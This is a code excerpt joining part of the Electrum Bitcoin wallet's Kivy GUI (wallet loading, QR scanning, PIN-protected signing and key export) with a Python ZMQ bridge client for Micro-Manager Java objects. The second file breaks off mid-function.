p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging ({} blocks)").format(server_lag)
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
status = str(text.strip() + ' ' + self.base_unit)
else:
status = _("Disconnected")
n = self.wallet.basename()
self.status = '[size=15dp]%s[/size]\n%s' %(n, status)
#fiat_balance = self.fx.format_amount_and_units(c+u+x) or ''
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
# workaround p4a bug:
# show an empty info bubble, to refresh the display
self.show_info_bubble('', duration=0.1, pos=(0,0), width=1, arrow_pos=None)
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
acquire.py
|
import zmq
import json
import numpy as np
from base64 import standard_b64decode, standard_b64encode
from types import MethodType #dont delete this gets called in an exec
import warnings
import re
import time
import json
import multiprocessing
import threading
import queue
from inspect import signature
import copy
import types
# for makign argument type hints. might be mergable with type mapping
_CLASS_NAME_MAPPING = {'boolean': 'boolean', 'byte[]': 'uint8array',
'double': 'float', 'double[]': 'float64_array', 'float': 'float',
'int': 'int', 'int[]': 'uint32_array', 'java.lang.String': 'string',
'long': 'int', 'short': 'int', 'void': 'void',
'java.util.List': 'list'}
_ARRAY_TYPE_TO_NUMPY_DTYPE = {'byte[]': np.uint8, 'double[]': np.float64, 'int[]': np.int32}
_JAVA_TYPE_NAME_TO_PYTHON_TYPE = {'boolean': bool, 'byte[]': np.ndarray,
'double': float, 'double[]': np.ndarray, 'float': float,
'int': int, 'int[]': np.ndarray, 'java.lang.String': str,
'long': int, 'short': int, 'char': int, 'byte': int, 'void': None}
class JavaSocket:
"""
Wrapper for ZMQ socket that sends and recieves dictionaries
"""
def __init__(self, context, port, type, debug):
# request reply socket
self._socket = context.socket(type)
self._debug = debug
# try:
if type == zmq.PUSH:
if debug:
print('binding {}'.format(port))
self._socket.bind("tcp://127.0.0.1:{}".format(port))
else:
if debug:
print('connecting {}'.format(port))
self._socket.connect("tcp://127.0.0.1:{}".format(port))
# except Exception as e:
# print(e.__traceback__)
# raise Exception('Couldnt connect or bind to port {}'.format(port))
def _convert_np_to_python(self, d):
"""
recursive ply search dictionary and convert any values from numpy floats/ints to
python floats/ints so they can be hson serialized
:return:
"""
if type(d) != dict:
return
for k, v in d.items():
if isinstance(v, dict):
self._convert_np_to_python(v)
elif type(v) == list:
for e in v:
self._convert_np_to_python(e)
elif np.issubdtype(type(v), np.floating):
d[k] = float(v)
elif np.issubdtype(type(v), np.integer):
d[k] = int(v)
def send(self, message, timeout=0):
if message is None:
message = {}
#make sure any np types convert to python types so they can be json serialized
self._convert_np_to_python(message)
if timeout == 0:
self._socket.send(bytes(json.dumps(message), 'utf-8'))
else:
start = time.time()
while 1000 * (time.time() - start) < timeout:
try:
self._socket.send(bytes(json.dumps(message), 'utf-8'), flags=zmq.NOBLOCK)
return True
except zmq.ZMQError:
pass #ignore, keep trying
return False
def receive(self, timeout=0):
if timeout == 0:
reply = self._socket.recv()
else:
start = time.time()
reply = None
while 1000 * (time.time() - start) < timeout:
try:
reply = self._socket.recv(flags=zmq.NOBLOCK)
if reply is not None:
break
except zmq.ZMQError:
pass #ignore, keep trying
if reply is None:
return reply
message = json.loads(reply.decode('utf-8'))
self._check_exception(message)
return message
def _check_exception(self, response):
if ('type' in response and response['type'] == 'exception'):
raise Exception(response['value'])
def close(self):
self._socket.close()
class Bridge:
"""
Create an object which acts as a client to a corresponding server running within micro-manager.
This enables construction and interaction with arbitrary java objects
"""
_DEFAULT_PORT = 4827
_EXPECTED_ZMQ_SERVER_VERSION = '2.4.0'
def __init__(self, port=_DEFAULT_PORT, convert_camel_case=True, debug=False):
"""
:param port: The port on which the bridge operates
:type port: int
:param convert_camel_case: If true, methods for Java objects that are passed across the bridge
will have their names converted from camel case to underscores. i.e. class.methodName()
becomes class.method_name()
:type convert_camel_case: boolean
:param debug: print helpful stuff for debugging
:type debug: bool
"""
self._context = zmq.Context()
self._convert_camel_case = convert_camel_case
self._debug = debug
self._master_socket = JavaSocket(self._context, port, zmq.REQ, debug=debug)
self._master_socket.send({'command': 'connect', })
reply_json = self._master_socket.receive()
if reply_json['type'] == 'exception':
raise Exception(reply_json['message'])
if 'version' not in reply_json:
reply_json['version'] = '2.0.0' #before version was added
if reply_json['version'] != self._EXPECTED_ZMQ_SERVER_VERSION:
warnings.warn('Version mistmatch between ZMQ server and Pygellan. '
'\nZMQ server version: {}\nPygellan expected version: {}'.format(reply_json['version'],
self._EXPECTED_ZMQ_SERVER_VERSION))
self._constructors = reply_json['api']
def construct_java_object(self, classpath, new_socket=False, args=[]):
"""
Create a new intstance of a an object on the Java side. Returns a Python "Shadow" of the object, which behaves
just like the object on the Java side (i.e. same methods, fields). Methods of the object can be inferred at
runtime using iPython autocomplete
:param classpath: Full classpath of the java object
:type classpath: string
:param new_socket: If true, will create new java object on a new port so that blocking calls will not interfere
with the bridges master port
:param args: list of arguments to the constructor, if applicable
:type args: list
:return: Python "Shadow" to the Java object
"""
methods_with_name = [m for m in self._constructors if m['name'] == classpath]
valid_method_spec = _check_method_args(methods_with_name, args)
# Calling a constructor, rather than getting return from method
message = {'command': 'constructor', 'classpath': classpath,
'argument-types': valid_method_spec['arguments'],
'arguments': _package_arguments(valid_method_spec, args)}
if new_socket:
message['new-port'] = True
self._master_socket.send(message)
serialized_object = self._master_socket.receive()
if new_socket:
socket = JavaSocket(self._context, serialized_object['port'], zmq.REQ)
else:
socket = self._master_socket
return JavaObjectShadow(socket=socket, serialized_object=serialized_object,
convert_camel_case=self._convert_camel_case)
def _connect_push(self, port):
"""
Connect a push socket on the given port
:param port:
:return:
"""
return JavaSocket(self._context, port, zmq.PUSH, debug=self._debug)
def _connect_pull(self, port):
"""
Connect to a pull socket on the given port
:param port:
:return:
"""
return JavaSocket(self._context, port, zmq.PULL, debug=self._debug)
def get_magellan(self):
"""
return an instance of the Micro-Magellan API
"""
return self.construct_java_object('org.micromanager.magellan.api.MagellanAPI')
def get_core(self):
"""
Connect to CMMCore and return object that has its methods
:return: Python "shadow" object for micromanager core
"""
if hasattr(self, 'core'):
return getattr(self, 'core')
self.core = self.construct_java_object('mmcorej.CMMCore')
return self.core
def get_studio(self):
"""
return an instance of the Studio object that provides access to micro-manager Java APIs
"""
return self.construct_java_object('org.micromanager.Studio')
class JavaObjectShadow:
"""
Generic class for serving as a pyhton interface for a micromanager class using a zmq server backend
"""
def __init__(self, socket, serialized_object=None, convert_camel_case=True):
self._java_class = serialized_object['class']
self._socket = socket
self._hash_code = serialized_object['hash-code']
self._convert_camel_case = convert_camel_case
self._interfaces = serialized_object['interfaces']
for field in serialized_object['fields']:
exec('JavaObjectShadow.{} = property(lambda instance: instance._access_field(\'{}\'),'
'lambda instance, val: instance._set_field(\'{}\', val))'.format(field, field, field))
methods = serialized_object['api']
method_names = set([m['name'] for m in methods])
#parse method descriptions to make python stand ins
for method_name in method_names:
lambda_arg_names, unique_argument_names, methods_with_name, \
method_name_modified = _parse_arg_names(methods, method_name, self._convert_camel_case)
#use exec so the arguments can have default names that indicate type hints
exec('fn = lambda {}: JavaObjectShadow._translate_call(self, {}, {})'.format(','.join(['self'] + lambda_arg_names),
eval('methods_with_name'), ','.join(unique_argument_names)))
#do this one as exec also so "fn" being undefiend doesnt complain
exec('setattr(self, method_name_modified, MethodType(fn, self))')
def __del__(self):
"""
Tell java side this object is garbage collected so it can do the same if needed
:return:
"""
if not hasattr(self, '_hash_code'):
return #constructor didnt properly finish, nothing to clean up on java side
message = {'command': 'destructor', 'hash-code': self._hash_code}
self._socket.send(message)
reply_json = self._socket.receive()
if reply_json['type'] == 'exception':
raise Exception(reply_json['value'])
def __repr__(self):
#convenience for debugging
return 'JavaObjectShadow for : ' + self._java_class
def _access_field(self, name, *args):
"""
Return a python version of the field with a given name
:return:
"""
message = {'command': 'get-field', 'hash-code': self._hash_code, 'name': name}
self._socket.send(message)
return self._deserialize(self._socket.receive())
def _set_field(self, name, value, *args):
"""
Return a python version of the field with a given name
:return:
"""
message = {'command': 'set-field', 'hash-code': self._hash_code, 'name': name, 'value': _serialize_arg(value)}
self._socket.send(message)
reply = self._deserialize(self._socket.receive())
def _translate_call(self, *args):
"""
Translate to appropriate Java method, call it, and return converted python version of its result
:param args: args[0] is list of dictionaries of possible method specifications
:param kwargs: hold possible polymorphic args, or none
:return:
"""
method_specs = args[0]
#args that are none are placeholders to allow for polymorphism and not considered part of the spec
fn_args = [a for a in args[1:] if a is not None]
valid_method_spec = _check_method_args(method_specs, fn_args)
#args are good, make call through socket, casting the correct type if needed (e.g. int to float)
message = {'command': 'run-method', 'hash-code': self._hash_code, 'name': valid_method_spec['name'],
'argument-types': valid_method_spec['arguments']}
message['arguments'] = _package_arguments(valid_method_spec, fn_args)
self._socket.send(message)
return self._deserialize(self._socket.receive())
def _deserialize(self, json_return):
"""
:param method_spec: info about the method that called it
:param reply: bytes that represents return
:return: an appropriate python type of the converted value
"""
if json_return['type'] == 'exception':
raise Exception(json_return['value'])
elif json_return['type'] == 'null':
return None
elif json_return['type'] == 'primitive':
return json_return['value']
elif json_return['type'] == 'string':
return json_return['value']
elif json_return['type'] == 'list':
return [self._deserialize(obj) for obj in json_return['value']]
elif json_return['type'] == 'object':
if json_return['class'] == 'JSONObject':
return json.loads(json_return['value'])
else:
raise Exception('Unrecognized return class')
elif json_return['type'] == 'unserialized-object':
#inherit socket from parent object
return JavaObjectShadow(socket=self._socket, serialized_object=json_return,
convert_camel_case=self._convert_camel_case)
else:
return deserialize_array(json_return)
############ Utility functions ############
def serialize_array(array):
return standard_b64encode(array.tobytes()).decode('utf-8')
def deserialize_array(json_return):
"""
Convet a serialized java array to the appropriate numpy type
:param json_return:
:return:
"""
if json_return['type'] == 'byte-array':
return np.frombuffer(standard_b64decode(json_return['value']), dtype='>u1').copy()
elif json_return['type'] == 'double-array':
return np.frombuffer(standard_b64decode(json_return['value']), dtype='>f8').copy()
elif json_return['type'] == 'int-array':
return np.frombuffer(standard_b64decode(json_return['value']), dtype='>i4').copy()
elif json_return['type'] == 'short-array':
return np.frombuffer(standard_b64decode(json_return['value']), dtype='>i2').copy()
elif json_return['type'] == 'float-array':
return np.frombuffer(standard_b64decode(json_return['value']), dtype='>f4').copy()
def _package_arguments(valid_method_spec, fn_args):
"""
Serialize function arguments and also include description of their Java types
:param valid_method_spec:
:param fn_args:
:return:
"""
arguments = []
for arg_type, arg_val in zip(valid_method_spec['arguments'], fn_args):
if isinstance(arg_val, JavaObjectShadow):
arguments.append(_serialize_arg(arg_val))
else:
arguments.append(_serialize_arg(_JAVA_TYPE_NAME_TO_PYTHON_TYPE[arg_type](arg_val)))
return arguments
def _serialize_arg(arg):
if type(arg) in [bool, str, int, float]:
return arg #json handles serialization
elif type(arg) == np.ndarray:
return serialize_array(arg)
elif isinstance(arg, JavaObjectShadow):
return {'hash-code': arg._hash_code}
else:
raise Exception('Unknown argumetn type')
def _check_method_args(method_specs, fn_args):
"""
Compare python arguments to java arguments to find correct function to call
:param method_specs:
:param fn_args:
:return: one of the method_specs that is valid
"""
# TODO: check that args can be translated to expected java counterparts (e.g. numpy arrays)
valid_method_spec = None
for method_spec in method_specs:
if len(method_spec['arguments']) != len(fn_args):
continue
valid_method_spec = method_spec
for arg_type, arg_val in zip(method_spec['arguments'], fn_args):
if isinstance(arg_val, JavaObjectShadow):
if arg_type not in arg_val._interfaces:
# check that it shadows object of the correct type
valid_method_spec = None
